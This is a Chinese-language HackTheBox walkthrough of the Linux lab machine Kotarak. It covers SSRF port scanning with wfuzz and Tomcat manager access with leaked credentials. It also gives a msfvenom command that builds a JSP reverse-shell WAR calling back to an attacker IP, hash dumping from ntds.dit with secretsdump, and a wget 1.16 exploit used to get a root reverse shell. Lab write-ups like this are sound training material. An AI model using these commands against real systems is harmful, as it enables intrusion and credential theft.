No.116-HackTheBox-Linux-Kotarak-Walkthrough滲透學習

**

HackTheBox-Linux-Kotarak-Walkthrough

**

靶機地址：https://www.hackthebox.eu/home/machines/profile/101
靶機難度：中級（5.0/10）
靶機發布日期：2017年10月22日
靶機描述：
Kotarak focuses on many different attack vectors and requires quite a few steps for completion. It is a great learning experience as many of the topics are not covered by other machines on Hack The Box.

作者：大餘
時間：2020-05-27

請注意：對於所有這些計算機，我是通過平臺授權允許情況進行滲透的。我將使用Kali Linux作爲解決該HTB的攻擊者機器。這裏使用的技術僅用於學習教育目的，如果列出的技術用於其他任何目標，我概不負責。

一、信息收集

可以看到靶機的IP是10.10.10.55…

Nmap掃描發現OpenSSH，Apache Tomca和Apache Web服務器都開放着…

訪問8080web是不完整的頁面返回…直接爆破發現了manager目錄…但是這裏訪問後還是錯誤頁面…去60000看看

60000是提供了私有的web服務器…

當訪問了60000後在訪問8080mannger後發現跳到了用戶登陸界面框…需要獲得賬號密碼…

這邊使用gubuster和dirb爆破了60000web服務頁面…
存在很多有價值的信息…例如rever-status、url.php等…

niko枚舉發現該頁面容易受到遠程SSRF（服務器端請求僞造）的攻擊…

SSRF

啓動burp並將請求/url.php?path=1發送到burp分析，原理SSRF允許我們查看內部服務器信息，嘗試查看目錄文件時，回覆的是繼續努力…SSRF還能查看本地監聽的端口…22是存在的…枚舉看看

命令：wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=localhost:FUZZ
這裏利用Wfuzz枚舉了本地開放的端口…888

通過URL打開localhost:888，其中包含一些指向不同文件的鏈接…

進入備份發現是空白的…

回來檢查源代碼發現了?doc=backup，複製繼續到web_url查看…

查看後還是空白的，我查看源代碼發現了有用的信息…獲得了賬號密碼…

利用用戶名密碼登陸了8080web界面…跳轉到了Tomcat默認頁面
Tomcat管理器UI具有一個小功能，它允許將.war文件部署到服務器…利用文件上傳提權…

命令：msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -f war> dayushell.war
這裏利用MSF創建了.war的shell，上傳成功提權…
這裏發現數據通道差，需要stty調整下…

這裏用戶枚舉發現存在Active Directory數據庫文件.dit和.bin…下載到本地…

命令：impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL
Ntds.dit文件是一個數據庫，用於存儲Active Directory數據，包括有關用戶對象，組和組成員身份的信息，它包括域中所有用戶的密碼哈希…
這是AD數據庫文件…利用secretsdump來轉儲哈希值…
可以看到轉儲了所有用戶對象組的哈希…

命令：awk -F: '{print $4}' hash
繼續轉儲…

頁面爆破或者john爆破都行，獲得了atanas和adminis…密碼…

這裏直接su提權…成功獲得user_flag信息…

上傳LinEnum.sh枚舉…

枚舉發現可以看到根目錄信息…
進來查看後發現了兩個文件…flag.txt和app.log
app獲得了很重要的信息：
1、IP 10.0.3.133每2分鐘利用GET調用一個名爲archive.tar.gz的文件…
2、IP 10.0.3.133機器上的wget版本是1.16，容易受到攻擊…

本地搜索wget存在的漏洞…40064EXP可利用…

wget <1.18當提供有惡意URL發送到惡意或受感染的Web服務器時，可以被誘騙保存攻擊者提供的任意遠程文件，並通過寫入.wgetrc在當前目錄下以及其他目錄下保存任意內容和文件名…
直接利用該EXP即可…

根據漏洞利用PoC所示，創建一個包含以下內容的.wgetrc文件，然後啓用了FTP服務器…

利用EXP寫入簡單shell…

命令：authbind python exploit.py
這裏需要利用authbind，因爲靶機啓用了authbind，authbind作用是root用戶和授權用戶只能綁定到1024以下的端口…
執行後，等待了5分鐘左右…成功獲得了反向外殼…獲得了root_flag信息…

apache爆破+SSRF攻擊+文件上傳提權+靶機枚舉+wget漏洞提權

由於我們已經成功得到root權限查看user和root.txt，因此完成這臺中級的靶機，希望你們喜歡這臺機器，請繼續關注大餘後期會有更多具有挑戰性的機器，一起練習學習。

如果你有其他的方法，歡迎留言。要是有寫錯了的地方，請你一定要告訴我。要是你覺得這篇博客寫的還不錯，歡迎分享給身邊的人。